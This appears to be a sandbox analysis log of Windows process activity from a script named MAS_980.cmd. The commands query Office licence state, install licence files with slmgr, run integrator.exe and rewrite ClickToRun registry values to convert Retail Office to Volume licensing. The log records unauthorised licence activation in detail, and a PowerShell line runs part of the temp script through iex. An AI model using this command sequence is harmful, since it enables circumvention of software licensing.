C:\Windows\System32\findstr.exefindstr /I /C:"ProPlusRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1704
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:992
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2412
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4160
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1196
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3408
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3164
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4684
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2060
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3656
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4420
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4276
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4680
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3900
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2484
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4544
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3308
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2716
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2796
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:872
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3000
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds7⤵
- Modifies registry key
PID:1840
-
-
C:\Windows\System32\findstr.exefindstr 20197⤵PID:4044
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds7⤵
- Modifies registry key
PID:4552
-
-
C:\Windows\System32\findstr.exefindstr 20217⤵PID:2780
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"7⤵PID:576
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%' ) get Name /value7⤵PID:1300
-
-
C:\Windows\System32\find.exefind /i "Office 21" "C:\Windows\Temp\sppchk.txt"7⤵PID:4048
-
-
C:\Windows\System32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"7⤵PID:3692
-
-
C:\Windows\System32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"7⤵PID:1952
-
-
C:\Windows\System32\find.exefind /i "Office 15" "C:\Windows\Temp\sppchk.txt"7⤵PID:476
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%' ) get Name /value7⤵PID:2024
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:776
-
-
C:\Windows\System32\find.exefind /i "Office 21"7⤵PID:3100
-
-
C:\Windows\System32\find.exefind /i "Office 19"7⤵PID:1504
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:572
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:2404
-
-
C:\Windows\System32\find.exefind /i "Office 16"7⤵PID:4812
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:3764
-
-
C:\Windows\System32\find.exefind /i "Office 15"7⤵PID:816
-
-
C:\Windows\System32\find.exefind /i "Office16ProPlusR" "C:\Windows\Temp\sppchk.txt"7⤵PID:240
-
-
C:\Windows\System32\find.exefind /i "Office16StandardR" "C:\Windows\Temp\sppchk.txt"7⤵PID:2884
-
-
C:\Windows\System32\find.exefind /i "Office16AccessR" "C:\Windows\Temp\sppchk.txt"7⤵PID:3004
-
-
C:\Windows\System32\find.exefind /i "Office16SkypeforBusinessR" "C:\Windows\Temp\sppchk.txt"7⤵PID:3820
-
-
C:\Windows\System32\find.exefind /i "Office16ExcelR" "C:\Windows\Temp\sppchk.txt"7⤵PID:2496
-
-
C:\Windows\System32\find.exefind /i "Office16OutlookR" "C:\Windows\Temp\sppchk.txt"7⤵PID:2956
-
-
C:\Windows\System32\find.exefind /i "Office16PowerPointR" "C:\Windows\Temp\sppchk.txt"7⤵PID:1832
-
-
C:\Windows\System32\find.exefind /i "Office16PublisherR" "C:\Windows\Temp\sppchk.txt"7⤵PID:3092
-
-
C:\Windows\System32\find.exefind /i "Office16WordR" "C:\Windows\Temp\sppchk.txt"7⤵PID:2756
-
-
C:\Windows\System32\find.exefind /i "Office16ProfessionalR" "C:\Windows\Temp\sppchk.txt"7⤵PID:4768
-
-
C:\Windows\System32\find.exefind /i "Office16HomeBusinessR" "C:\Windows\Temp\sppchk.txt"7⤵PID:2392
-
-
C:\Windows\System32\find.exefind /i "Office16HomeStudentR" "C:\Windows\Temp\sppchk.txt"7⤵PID:4688
-
-
C:\Windows\System32\find.exefind /i "Office16ProjectProR" "C:\Windows\Temp\sppchk.txt"7⤵PID:944
-
-
C:\Windows\System32\find.exefind /i "Office16ProjectStdR" "C:\Windows\Temp\sppchk.txt"7⤵PID:1704
-
-
C:\Windows\System32\find.exefind /i "Office16VisioProR" "C:\Windows\Temp\sppchk.txt"7⤵PID:992
-
-
C:\Windows\System32\find.exefind /i "Office16VisioStdR" "C:\Windows\Temp\sppchk.txt"7⤵PID:3464
-
-
C:\Windows\System32\sc.exesc query ClickToRunSvc7⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\System32\sc.exesc query OfficeSvc7⤵
- Launches sc.exe
PID:3900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul7⤵PID:556
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath" 2>nul7⤵PID:3308
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:2076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul7⤵PID:760
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:4340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul7⤵PID:3000
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul7⤵PID:4044
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul7⤵PID:2780
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID" 2>nul7⤵PID:4920
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID8⤵
- Modifies registry key
PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds" 2>nul7⤵PID:1300
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds8⤵
- Modifies registry key
PID:3236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration" 2>nul7⤵PID:2120
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration8⤵
- Modifies registry key
PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul7⤵PID:572
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:2272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul7⤵PID:4136
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:2832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingService get Version /value"7⤵PID:4676
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value8⤵PID:240
-
-
-
C:\Windows\System32\findstr.exefindstr /V /R "^$"7⤵PID:3092
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseStatus='1' AND PartialProductKey is not NULL) get Description7⤵PID:4428
-
-
C:\Windows\System32\find.exefind /i "RETAIL channel" "C:\Windows\Temp\crvRetail.txt"7⤵PID:2412
-
-
C:\Windows\System32\find.exefind /i "RETAIL(MAK) channel" "C:\Windows\Temp\crvRetail.txt"7⤵PID:3464
-
-
C:\Windows\System32\find.exefind /i "TIMEBASED_SUB channel" "C:\Windows\Temp\crvRetail.txt"7⤵PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_980.cmd') -split ':cleanlicense\:.*';iex ($f[1]);"7⤵PID:3900
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily7⤵PID:3920
-
-
C:\Windows\System32\findstr.exefindstr /V /R "^$"7⤵PID:3828
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProPlus2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1300
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:984
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3164
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Standard2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2272
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:572
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2832
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Access2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4136
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2884
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Excel2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:856
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Outlook2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3528
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPoint2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2960
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Publisher2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4664
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Word2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1016
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Professional2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4688
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4856
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeStudent2021Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3728
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProPlus2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3736
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1336
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2412
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Standard2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3464
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1160
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4496
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Access2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3308
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4144
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Excel2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1068
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Outlook2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:884
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPoint2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3748
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Publisher2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:716
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Word2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4356
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Professional2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3244
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:888
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeStudent2019Retail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4896
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4872
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4352
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4316
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3932
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1892
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2796
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4992
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:800
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4736
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3724
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4644
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3828
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4816
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2024
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2404
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2272
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:572
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365ProPlusRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2832
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4136
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2884
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:856
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3528
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProPlus2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2960
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4664
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1760
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Standard2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4688
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4856
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3728
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Access2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3736
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusiness2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1336
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Excel2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2412
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Outlook2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3464
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPoint2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1160
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Publisher2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4496
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"Word2019Volume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3308
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4144
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1068
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:884
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3748
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:716
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4356
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4020
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2600
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:1080
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:4632
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3704
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2780
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:3364
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\crvProductIds.txt"7⤵PID:2076
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\86F0D9BB-50AB-4F98-8627-FB2D4522BBCD\ProPlusRetail.167⤵
- Modifies registry key
PID:1840
-
-
C:\Windows\System32\find.exefind /i "Office16ProPlusVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"7⤵PID:1556
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\86F0D9BB-50AB-4F98-8627-FB2D4522BBCD\ProPlusVolume.167⤵
- Modifies registry key
PID:800
-
-
C:\Windows\System32\find.exefind /i "Office16MondoVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"7⤵PID:4736
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms"7⤵PID:3724
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"7⤵PID:1808
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms"7⤵PID:352
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms"7⤵PID:4048
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms"7⤵PID:2488
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul.xrm-ms"7⤵PID:4304
-
-
C:\Windows\System32\cscript.execscript //Nologo //B C:\Windows\System32\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office.xrm-ms"7⤵PID:4688
-
-
C:\Windows\System32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady7⤵
- Modifies registry key
PID:2260
-
-
C:\Program Files\Microsoft Office\root\integration\Integrator.exe"C:\Program Files\Microsoft Office\root\integration\integrator.exe" /I /License PRIDName=ProPlus2019Volume.16 PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"7⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3728
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' get LicenseFamily7⤵PID:3000
-
-
C:\Windows\System32\find.exefind /i "ProPlus2019VL_"7⤵PID:716
-
-
C:\Windows\System32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady /t REG_SZ /d 17⤵
- Modifies registry key
PID:4020
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds7⤵
- Modifies registry key
PID:2600
-
-
C:\Windows\System32\findstr.exefindstr /I "ProPlus2019Volume"7⤵PID:3980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds7⤵PID:4632
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds8⤵
- Modifies registry key
PID:3580
-
-
-
C:\Windows\System32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds /t REG_SZ /d "ProPlusRetail,ProPlus2019Volume" /f7⤵
- Modifies registry key
PID:932
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingService where version='10.0.19041.1266' call RefreshLicenseStatus7⤵PID:3868
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"7⤵PID:4992
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%' ) get Name /value7⤵PID:4920
-
-
C:\Windows\System32\find.exefind /i "Office 21" "C:\Windows\Temp\sppchk.txt"7⤵PID:4892
-
-
C:\Windows\System32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"7⤵PID:2120
-
-
C:\Windows\System32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"7⤵PID:984
-
-
C:\Windows\System32\find.exefind /i "Office 15" "C:\Windows\Temp\sppchk.txt"7⤵PID:1300
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%' ) get Name /value7⤵PID:4256
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:2272
-
-
C:\Windows\System32\find.exefind /i "Office 21"7⤵PID:4692
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:4928
-
-
C:\Windows\System32\find.exefind /i "Office 19"7⤵PID:1948
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:1704
-
-
